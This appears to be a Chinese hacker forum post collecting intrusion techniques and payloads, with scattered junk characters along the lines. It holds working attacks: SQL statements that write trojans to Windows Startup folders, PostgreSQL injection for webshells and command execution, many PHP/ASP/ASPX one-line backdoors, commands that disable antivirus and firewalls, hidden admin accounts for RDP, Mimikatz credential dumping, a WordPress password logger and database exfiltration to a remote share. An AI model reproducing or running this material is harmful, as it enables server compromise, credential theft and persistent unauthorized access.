中文版本操作系统中针对mysql添加用户完整代码:- y y; J$ J) [* ?# ]
* X/ p0 ^( j5 T: l3 \& d+ S. [
use test;# j1 _/ t S! q8 Z
create table a (cmd text);8 G, D0 W' q7 ~' H
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
& J$ o/ a6 r% J9 L7 }insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );( \3 F1 j j( C4 I+ U
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
0 D. q7 I6 [+ \: Tselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";. M1 \+ t3 r% q3 v
drop table a;0 P3 S* K3 T, [! c. e8 t
1 x) c* G) e2 g
英文版本:
0 d6 w+ h3 ~" o4 c
6 d7 \4 j1 R( n* B/ i1 S9 a- ^use test;
) C- w7 a3 ?- ^+ F( H0 vcreate table a (cmd text);
7 T! h' k0 `2 F/ q! ]1 ainsert into a values ("set wshshell=createobject (""wscript.shell"") " );( |$ Z& q* X5 Y
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& a y7 h o Yinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );/ g% h+ t* X. n$ ^: S
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";7 O a5 z' i1 P6 a% R
drop table a;% i6 d# q( J: z# V4 B" q
; S3 S( Z9 l% P5 F7 Z' b
create table a (cmd BLOB);
\- O) U) b# p) {insert into a values (CONVERT(木马的16进制代码,CHAR));
) {8 g- c% B; X+ Iselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe') d0 w1 C/ m6 A3 D
drop table a;
; b# h; y# |) ^8 Y- Z4 N- F- g# Y- @9 z9 G0 J) `! {
记录一下怎么处理变态诺顿: j3 ^: i( J! q
查看诺顿服务的路径 b m4 s- j$ [0 H
sc qc ccSetMgr4 Y. l# i& s ]( y. {
然后设置权限拒绝访问。做绝一点。。
! P5 s( y0 c3 F$ tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system' q& v7 x( K/ J' ~9 c6 C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
" v( b/ f0 t- {' Gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
, a+ n+ K. a) \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone3 }" y0 _8 F0 Y! m$ F* V
3 i" t1 `5 O# H4 W4 Z
然后再重启服务器
}* N- m. s* f0 v# i' y" \iisreset /reboot9 f/ G1 [) W& z, F- A; @$ C- @
这样就搞定了。。不过完事后。记得恢复权限。。。。3 A h3 _- u+ |. O$ u8 Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
" W- |/ V% [5 b& Qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
# p3 P8 W8 B* `* q) ?& N" L: jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F0 b3 Z: \( a3 s/ a
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F& _* F$ p X3 L, u
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 x" h2 \$ m& O/ t/ Y
% g& \& |3 Y, K) [3 jEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')& h$ _2 n5 a! ~" Q# d1 P/ p
6 @( v* t9 d5 h7 kpostgresql注射的一些东西
4 [5 q" x9 Q, S& W; K1 n, C如何获得webshell
; k8 ~$ R/ `! a% `http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
. O0 b+ W/ d! l5 _ ]http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
7 T) ?$ p& G, @3 \ b( \7 Vhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
/ g# g# m6 F. q6 ]' N# M* |如何读文件- L- L" d: |+ p; ?6 k- n4 {
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);. X; _6 Q& w+ G* L3 t2 _
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;: v- a" ?0 c) i# t. ^' Z. ?
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
7 {, j, O6 T9 t+ _
2 Q* O, i6 P: g- qz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。; s0 g1 ]; a$ \( k$ M g
当然,这些的postgresql的数据库版本必须大于8.X
- {5 e$ K. V" _+ p创建一个system的函数:
% n' s; o' K5 C0 pCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
# g" j8 N( `$ \
2 i5 s& `, w2 w$ z! O0 @. n创建一个输出表:! v) J* B: e& r6 N4 B' @
CREATE TABLE stdout(id serial, system_out text)
8 y/ \1 y2 J5 r4 y9 o. A; S; m
d( J" I& G% J6 a执行shell,输出到输出表内:
# v9 Q) G" D `& s6 ?SELECT system('uname -a > /tmp/test')- J7 [9 X# f3 P. g- J7 {: h5 D
8 i+ h/ ]2 ^! A y
copy 输出的内容到表里面;
. Q/ o' U, `3 h& Y" K2 gCOPY stdout(system_out) FROM '/tmp/test'9 g ~8 w0 \5 Q
0 O7 [1 m* ^% X/ y7 f$ `& G/ h
从输出表内读取执行后的回显,判断是否执行成功# |3 y" [9 \4 k) k! e5 D3 H) k
3 q+ ^9 `6 X) J5 y+ N; qSELECT system_out FROM stdout
1 Q* j6 {1 U3 Y% x下面是测试例子
( d2 n' v, e& m0 X0 Z Y& f8 Y1 S2 q5 g
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
R& D; O% t" }5 W. ~
2 A9 c8 T, [' Y- S, Z; V/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'. `0 l; B) z2 G: L. m/ `* e/ M
STRICT --
) M7 @; R, G0 q( w, H: R# Q3 D. h# p* t) r' r4 ~! X
/store.php?id=1; SELECT system('uname -a > /tmp/test') --6 D# H$ J/ `& N$ \
$ \2 e+ N, d4 [" j/ Z/ m$ m/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --2 c" _9 T: x5 Q1 b. m; z6 @
# S5 p) \9 h+ `1 V
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--. j, f2 ~- c: `: R, W* x
net stop sharedaccess stop the default firewall& n8 g) Z% W% l! M3 ?+ z
netsh firewall show show/config default firewall C1 f, I5 _5 Z0 O+ f+ |+ |) g
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
. ?- b1 f, W% G4 h0 y. c+ P0 Dnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall8 e. s+ j; S7 K& A- B
修改3389端口方法(修改后不易被扫出). Y' ]$ V4 `: b0 Q% R2 B
修改服务器端的端口设置,注册表有2个地方需要修改" {( u" S7 ?% D8 H8 \) a
+ w( g0 n2 T) M0 G: \
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" C. d; u6 v N; V* R9 l/ mPortNumber值,默认是3389,修改成所希望的端口,比如6000
& ]6 c" J! {. Q& M. k) m
4 ~) O5 G5 i0 `6 H. [0 i5 _- G: c第二个地方:" k9 G8 O, B* e: R
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] , D& F- ~$ z9 a$ V8 g2 `
PortNumber值,默认是3389,修改成所希望的端口,比如6000
% |2 `0 [% J' L" f4 G2 ?
! ^, }* P" c& w: Z7 E2 `, h# J现在这样就可以了。重启系统就可以了
$ a# R: K- W: }$ }& p, y: p/ ~ b
查看3389远程登录的脚本
% R9 V5 [' w! C保存为一个bat文件
$ B7 x6 `% f" Ydate /t >>D:\sec\TSlog\ts.log
/ G2 |& L; S O ~# |6 dtime /t >>D:\sec\TSlog\ts.log6 z% l) M( _2 P
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log# E" m' d3 m$ F) w8 Q) W
start Explorer
& q$ n/ w! X2 i2 d7 R5 B6 g% h
P8 |6 |6 c$ F6 E+ M4 a6 N) pmstsc的参数:5 E/ K5 _- w) f7 V- A3 _4 I
% Y7 l, X7 T$ Y( n+ S3 C! n( L
远程桌面连接# g& q/ B/ L$ j" R0 p0 O2 h
1 u4 L8 `$ R4 B- aMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
7 O; I* R) V x# L, @ [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?+ H" o N8 ?8 m U0 Z4 t
0 V6 D; \& j8 q* {<Connection File> -- 指定连接的 .rdp 文件的名称。
3 h, G+ ^6 W$ w9 G' i# u# E6 o
8 y, r+ `8 Z: s" j/v:<server[:port]> -- 指定要连接到的终端服务器。
/ s/ M" E& E: z' }0 ]% {2 ~$ ^+ H! a: O5 p; x
/console -- 连接到服务器的控制台会话。
" C8 B, i& T" s6 f& c- R5 A6 k% [) n/ Z) u0 w, y4 o
/f -- 以全屏模式启动客户端。
- e. {& P: P8 v. ?; j9 w2 o1 N% z2 x: g
/w:<width> -- 指定远程桌面屏幕的宽度。
0 c* t. P% r8 L" T. H; m5 k) W# S% {% R+ b2 M
/h:<height> -- 指定远程桌面屏幕的高度。
$ c! ]2 l$ I' J7 G0 `, `
# |1 m, ]3 ~- E# F/edit -- 打开指定的 .rdp 文件来编辑。/ S' D- U6 Q9 D5 }& ]
/ V$ [+ K+ D+ P T8 s7 i$ T/migrate -- 将客户端连接管理器创建的旧版
. J3 c) O% b; ?9 ~ z连接文件迁移到新的 .rdp 连接文件。
+ p+ v$ Q! ?5 e) f$ K: O6 T$ Z
& X" ]' E' G, V7 i8 V4 r' b
+ I$ t( r g$ a ?% R4 M其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
/ S0 _* O5 }9 C; G5 d+ s! j! W8 wmstsc /console /v:124.42.126.xxx 突破终端访问限制数量# A- ^' [+ \+ z$ u4 d9 U* j
7 u# f9 G( x4 A0 M
命令行下开启3389
4 M) x1 F/ `7 y+ Cnet user asp.net aspnet /add" }+ @! N1 Q- Z1 \: s, s- J. z7 @
net localgroup Administrators asp.net /add5 h1 \' e S9 {
net localgroup "Remote Desktop Users" asp.net /add1 r3 t) D7 k( ?
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
, i1 C$ F S5 }1 S# z9 mecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
9 I8 Z1 y, R7 W( i' q* B. becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
) M' n0 ?- T; C5 e$ c' i; ~echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
* Y3 }" E+ D% u# Fsc config rasman start= auto
) b+ ]- p' h3 \+ n nsc config remoteaccess start= auto
1 _( \1 X! r6 K4 Onet start rasman
) m4 a v4 h/ Knet start remoteaccess+ g3 @8 ~* F8 q
Media; k0 x4 s* X1 w/ m
<form id="frmUpload" enctype="multipart/form-data"
! `6 V& J0 b+ _action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>( t; Q5 b0 \, ^2 m4 M; V5 b# A1 d
<input type="file" name="NewFile" size="50"><br>
, R+ S# r, K- v: J<input id="btnUpload" type="submit" value="Upload">
; _. t" N6 v# M; v" k4 Z& G</form>
: W& e) z+ x2 L7 X5 N8 l
- Q; h3 x0 [% e! _4 d" w0 Q9 rcontrol userpasswords2 查看用户的密码
8 k8 ]# `5 i" [' h' ?- o# Aaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径& q: O" B5 B# {1 g/ i% }
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. P" A, J" v3 K" f8 M/ r- }" i
$ u0 n, j& H H; V# Y141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
) T. B4 u0 o( T$ f% m( I9 ~" Q, O8 g, u测试1:1 ]7 _! o# f" J& z3 v% ]: W
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
+ g: y6 y8 S5 _5 N1 b8 w5 Q
' K% t/ ?: T1 T# G/ C测试2:
$ o! a6 ]. a( w8 m9 o9 B5 A. D& p, W& N
create table dirs(paths varchar(100),paths1 varchar(100), id int)) s% L3 r( N9 R. @8 C& m. {) L
+ Z7 t2 E' \0 p- M o: xdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
3 m7 c! `9 @- \- }' ?( G8 M7 S5 b W1 A: Q
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
3 w( H3 U ]8 P# C5 |+ S关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
_( E6 M2 Q+ Z/ W7 ^+ Z7 n7 g可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;; {$ p5 b# L/ o8 R
net stop mcafeeframework' |' Z6 Z$ B; f, x. f- ?
net stop mcshield
; T& ^% {6 [. \net stop mcafeeengineservice" V3 b* \2 p+ k( E- H
net stop mctaskmanager
) u& c3 N0 @$ q* Ghttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D6 Q. m4 |# F4 k+ y4 t
! Q0 {( {1 w1 q- p- W VNCDump.zip (4.76 KB, 下载次数: 1)
% G2 [: Y. q" ^密码在线破解http://tools88.com/safe/vnc.php# d3 y# w3 t. u! j
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取! n3 a: ^; o& U1 b
5 K# i0 r- M1 n Y7 ^% ^exec master..xp_cmdshell 'net user'4 @7 g, x1 d; @' X* W; T
mssql执行命令。9 K4 Z: I2 @9 E8 U" I
获取mssql的密码hash查询
b- O* g2 l+ s; z# iselect name,password from master.dbo.sysxlogins
$ Q, o) J7 o) H0 p; {' O. z/ j* ?" W1 ]
backup log dbName with NO_LOG;
/ e7 j" t/ `7 s% F4 `' h- ~backup log dbName with TRUNCATE_ONLY;
; F9 e5 S- z9 c6 MDBCC SHRINKDATABASE(dbName);
& U' m- t, n. [; G& t* Hmssql数据库压缩9 g. b/ T3 K1 R
9 z1 P3 _: W) d' U1 M- a
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK2 m5 q( Z2 S6 L' n4 G* S
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。. L5 P, T% K9 t
2 Y% `$ g, n2 K: R4 i6 S
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'! T7 ]9 a- }- l9 `7 I# `- g
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak3 }% q$ G& C' g+ P T: {+ n4 C
6 P& k0 x* [/ @9 {/ k1 k0 ~Discuz!nt35渗透要点:
9 Y5 x* l ^" l; E* H* G(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
/ L* R5 s5 n. [% O(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>% m& V4 L* Y5 n, K8 c) m
(3)保存。
, z# U8 Q6 G! l& {(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass1 O4 G: n5 f6 H# O! S6 T
d:\rar.exe a -r d:\1.rar d:\website\, c9 K0 D' y: z6 w$ F$ U/ H
递归压缩website
- n+ j. G3 _- I注意rar.exe的路径! l2 g0 L. q% b( f0 F
% F0 K" ~" e. N6 i1 |<?php% I2 ~; B& {! t9 G! G, T
3 } M- n7 l5 J$telok = "0${@eval($_POST[xxoo])}";
" X3 A: M* C; p9 ~5 \4 X6 x' d
8 o2 N' i( A b! y- a: V2 s: C- A- C( @$username = "123456";
) M6 j# Q9 C; v9 M: K
0 H/ C. I4 ^8 z% R4 v$userpwd = "123456";
. k' Z2 \0 V- F) u3 t8 D! i
8 N, E+ D! B6 Y0 q$telhao = "123456";
1 @& c) b- m. }/ N% G+ L* A" f1 s+ a% n+ q7 p! k( @+ c( M
$telinfo = "123456";! ~9 E4 F, v$ F9 h! @! F/ g
; E. j3 d- g& n$ B
?>
: g6 ]# Y- g9 `php一句话未过滤插入一句话木马
" A. ^0 Q4 {$ a$ Z) T8 T7 r
4 P# m8 q% Q5 Z2 ?% J% a3 L: t9 i站库分离脱裤技巧
0 j% ~' N4 M6 G9 x, Hexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'/ h0 }$ ~4 P0 f% L" j9 }
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
' e8 R2 y S; t- z! K条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
' W# ]$ y% @( ~( u: u& Z这儿利用的是马儿的专家模式(自己写代码)。, c- w4 x1 @" N6 ?/ m0 c
ini_set('display_errors', 1);
9 Y, [& f( o# b2 H6 e7 zset_time_limit(0);
) h) ~; S9 x% o& k2 Q- ~$ b, Merror_reporting(E_ALL);
' a# |- ?# b8 N4 a( Y4 p( Y$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());5 p5 u, v5 I& q% R( r% ]6 I
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());' y7 t# b2 i+ B# M" \: u
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
; U2 l! q: a& o5 f V$i = 0;+ c: r9 i, W! v; v8 {- h
$tmp = '';8 p9 A3 Q9 [( }9 u( a
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {3 l1 w9 E/ a+ i' {/ w ?) C
$i = $i+1;& z; o5 z# K( W
$tmp .= implode("::", $row)."\n";# }2 S& u; D6 J/ X& g% }3 a' f* n4 \
if(!($i%500)){//500条写入一个文件& p6 B) X8 Q2 L
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
# q9 F; p7 F, C: j file_put_contents($filename,$tmp);1 y% q( D$ O. [9 |/ b9 d
$tmp = '';
5 r4 D9 [# \ G' M7 {6 ~! }7 l }4 m# h9 Z) j2 Q
}2 s/ y s9 j/ Z' Y
mysql_free_result($result);
' I6 Y J9 r$ t' s0 U3 u/ d0 j6 A) r4 R. w- k$ p% |
& h. d4 _4 e$ @; n( a9 [6 ]* d
8 z- J0 ~, S- [8 I3 W% L//down完后delete# `5 d3 R! g+ ?- C* n: a
5 a8 P. F6 u: O v
; K& j, v- E6 a% O, `+ Uini_set('display_errors', 1);
4 q+ Y. p0 p- u. ^+ N) uerror_reporting(E_ALL);; ]3 w( E5 ]" b% W ?+ L
$i = 0;* f" Q# Y( ?; }
while($i<32) {# f2 P, t6 w h* X
$i = $i+1;
+ w: g& U! ?; ~) L$ s$ q $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
- M0 X) @* r! F+ W unlink($filename);( [/ h" v5 y6 l. E" x$ I! b
}
1 Y- @' O# r: whttprint 收集操作系统指纹
' `* n( A( ?- f1 O- B- x E扫描192.168.1.100的所有端口4 D1 z% q" R0 H: T
nmap –PN –sT –sV –p0-65535 192.168.1.100
" _) c+ a {) E+ T' b0 ^host -t ns www.owasp.org 识别的名称服务器,获取dns信息
) k3 V: X% A3 @- |1 [1 shost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输9 v) \. f, `! @5 J' X& b
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host. ^. q1 k9 [- |
2 J& C. v, `5 B3 u2 D, T& I6 S
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册), n6 _0 `3 C/ Z3 s7 l1 D6 j
8 @3 L# W: ]8 R" H5 K: } MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)7 p& S2 f9 W: |2 _5 b1 j. S
" z" W" P$ V+ J0 J% Y Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x' u \( a. z% ]: a) u
" C7 O9 @% w2 W1 P: E6 a; i DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
% c- f& N# ?# @$ B" T" ^; c4 q8 n* h* C/ f
http://net-square.com/msnpawn/index.shtml (要求安装)+ T. Z5 g) P6 R% O. r" Q- b
) Q; Y' ~4 T- S; z2 c9 [% n tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
. z7 z6 ?" I+ S& i( X3 g. q: e5 _. Y- c- d* J; B: Y& S+ I2 _
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
/ t4 \! w. }1 v& E \5 K+ }' a) r* dset names gb2312' z- T1 N5 |$ J, {6 b1 U
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。/ Q' a- O" K1 h. B' z
) |. j0 a% d) b+ p5 ^6 I, e gmysql 密码修改
- p4 G) s+ h8 r0 L3 \% HUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 7 x( o5 ^" a" Q# ?- J! g
update user set password=PASSWORD('antian365.com') where user='root';* q( t- r, L! u
flush privileges;
. n4 R( I/ k/ P: b1 I1 W" u高级的PHP一句话木马后门1 a( X- p6 N- W, y; h1 g
: t/ l2 [$ `) \7 ~. C
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
6 n$ z. s5 R# W D7 A: Q
1 B; `! W! ^4 O7 k% s1、
3 I5 ]7 F, ], G: U
7 B. `- |8 a* j0 Q$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";; l7 x# O8 N7 X+ _/ ?9 f
+ N( k+ {8 b0 u7 ]$hh("/[discuz]/e",$_POST['h'],"Access");
0 D2 x5 m% \" ]0 O( g E& v% b; a/ f. y4 L- ]0 p J1 k7 ]# Z
//菜刀一句话" ]1 R% F5 @9 f. d- C& t
; f( U, _; I, g( v6 }/ G# c% G; @2、
' n v3 r* n+ S7 P+ h1 V
3 r4 U' v! u8 p$filename=$_GET['xbid'];
5 I" w: a$ S) Y' c* f6 Y/ {2 Y5 ^4 M% g' O5 M: ~. k; ?2 j' d2 A
include ($filename);0 T* w$ Y Q& U
S7 z/ g* b$ `9 [, U/ \( u( E+ d! c
//危险的include函数,直接编译任何文件为php格式运行- E' U/ f8 r+ k% {& |* V( f- H, [6 ]
! {1 l, Z% O% c( A6 v8 ?
3、
2 B+ O0 _$ Z+ g; N1 d' I/ [% r; U; |" {; x, J v. Y+ V r' e" Z2 j
$reg="c"."o"."p"."y"; x5 N7 I! f, C( B' _) B
1 l# s- k, _4 J* E2 E. d- j
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
) K! l+ n% {: D( L5 `- m* ^/ b; j* H9 d
//重命名任何文件
) c, k; C' N* ? T! G) }2 v; j0 E; E0 D) h8 I# t, w4 V
4、' d' ^' @# ^- f4 b5 ?2 p: T
, T) `% ^$ k/ D5 t6 T- z$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
- a0 v' q, V* i4 W* y5 o/ l& l$ b4 d7 U+ I( |9 o5 M7 a
$gzid("/[discuz]/e",$_POST['h'],"Access");
) b! X! S$ V9 @ W# i
: r! [& r! F3 h1 D: U/ K) S; p7 r//菜刀一句话
1 A5 g/ H1 I/ v) i' D3 g) x9 D2 }- `( u/ w8 \( K+ j
5、include ($uid);$ G. S6 f9 F9 j3 N' t: }
+ Q+ o% P! m! n- u$ J# B0 e5 g* ]//危险的include函数,直接编译任何文件为php格式运行,POST
' I$ \, J$ b8 n* k- b
; E0 b% {6 C" c1 _. M; o, C
7 J& V8 O8 X9 X7 E, T: f# [//gif插一句话: I6 g$ }: j. U
% U; j7 C7 c! R, m! V
6、典型一句话2 @# J; i2 i1 l5 o1 v# d9 E) X
5 A4 z# E, z: K
程序后门代码
5 y0 u P! D5 _<?php eval_r($_POST[sb])?>
% ]$ u, b- \% d' o. p2 ]程序代码
9 \% }7 p" G" m5 k& t/ D; `1 o<?php @eval_r($_POST[sb])?>7 r% E! j! W# Q% D8 Z
//容错代码
% q! T$ Y5 A( _! r2 W程序代码6 r" c. e" f" }, b/ [5 R! @
<?php assert($_POST[sb]);?>
7 b1 P7 r4 i6 v! m8 W//使用lanker一句话客户端的专家模式执行相关的php语句/ p) M, d9 ?6 v+ D8 m
程序代码
# s# a# z1 \" T" U5 ~; }5 K<?$_POST['sa']($_POST['sb']);?>
; h3 O Q8 D) C) [: g/ i1 w9 u程序代码, a9 I- [+ v. i
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
7 |" F( V; s: U% `$ U: O程序代码
6 G6 ?% U2 e# _. E E% M b) n8 l<?php$ F2 {9 v3 |$ V/ ]# z: F# a3 v
@preg_replace("/[email]/e",$_POST['h'],"error");* L8 `7 U. V, `: q2 n
?>
- h) ]; u; {. ]* Q//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
" H5 z0 G: A* K! e# E+ u程序代码
$ H( ?, T' j- W<O>h=@eval_r($_POST[c]);</O>' H5 [$ P% m1 _: z+ ^3 S- m% s
程序代码/ \, M5 V3 h8 r) Z6 w
<script language="php">@eval_r($_POST[sb])</script>, ~- g! R9 G) j$ N
//绕过<?限制的一句话/ O4 V- V7 A" i( c4 K! v
% y# w. A5 a% [1 F: B: khttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip5 S$ U2 L+ r5 H4 f6 Q
详细用法:
& f" ^, Q7 J% I0 D, E' A4 d1、到tools目录。psexec \\127.0.0.1 cmd3 t* ?5 Y* K2 E2 O' ^
2、执行mimikatz$ O% V z# x; w6 [
3、执行 privilege::debug; [; h' m" H5 r1 g/ Y: Y' e
4、执行 inject::process lsass.exe sekurlsa.dll
, d# z# w: F: o5 t0 q3 b$ D8 w+ s5、执行@getLogonPasswords' V$ g) C7 B! Q# Q T
6、widget就是密码0 [7 b* y6 x* n
7、exit退出,不要直接关闭否则系统会崩溃。
, }% U; D5 d* ]# q/ ^1 m
. \$ h1 H4 T" E% o. i& jhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
- d. c) q5 ]5 \) U( S# a2 e0 b, g; A4 e& l8 ]: K
自动查找系统高危补丁
9 u- A; y8 p! g+ ~" a. c# f2 usysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
1 }4 K4 N M- r
" L* v. s9 ?9 x& g突破安全狗的一句话aspx后门
x+ m4 C& r8 E' p7 i<%@ Page Language="C#" ValidateRequest="false" %>, S& z3 g7 I# J- e6 A0 s
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>* z: T" }8 E9 P) L4 _
webshell下记录WordPress登陆密码
/ e1 Q: V3 J8 V5 [. q+ ^. swebshell下记录Wordpress登陆密码方便进一步社工1 h- R2 }( [. u' [( r9 h
在文件wp-login.php中539行处添加:
! o- Q. {% @) G0 o8 w) J// log password5 a: \4 k1 t) j$ G( b
$log_user=$_POST['log'];
7 ^7 h5 |7 N7 `8 H$ z9 p6 F$log_pwd=$_POST['pwd'];
; B8 V. o# }% r& O$log_ip=$_SERVER["REMOTE_ADDR"];5 f; Q4 K6 L5 A) {* r* ^, a
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;) H7 M; u, U. G
$txt=$txt.”\r\n”;! t8 ?0 j0 y4 C7 l7 g
if($log_user&&$log_pwd&&$log_ip){
# x q* `8 b G4 l# m! j@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
/ J: c! Q% s' c% Z/ t8 d}+ g5 D* S, \3 R. W
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
8 H' s* p: l3 Y6 T就是搜索case ‘login’% W! x9 {1 v" c$ ^2 o- g& j6 Y" x
在它下面直接插入即可,记录的密码生成在pwd.txt中,
0 m5 K- Y* K0 \! c4 M其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
, P* H" v: ?8 M& e. ]2 A利用II6文件解析漏洞绕过安全狗代码:- _$ C& T! P2 q7 q6 `7 X
;antian365.asp;antian365.jpg
: U0 N4 o" E' J$ X) g& ~, N* [/ q: x. C+ ?, C, Y5 I
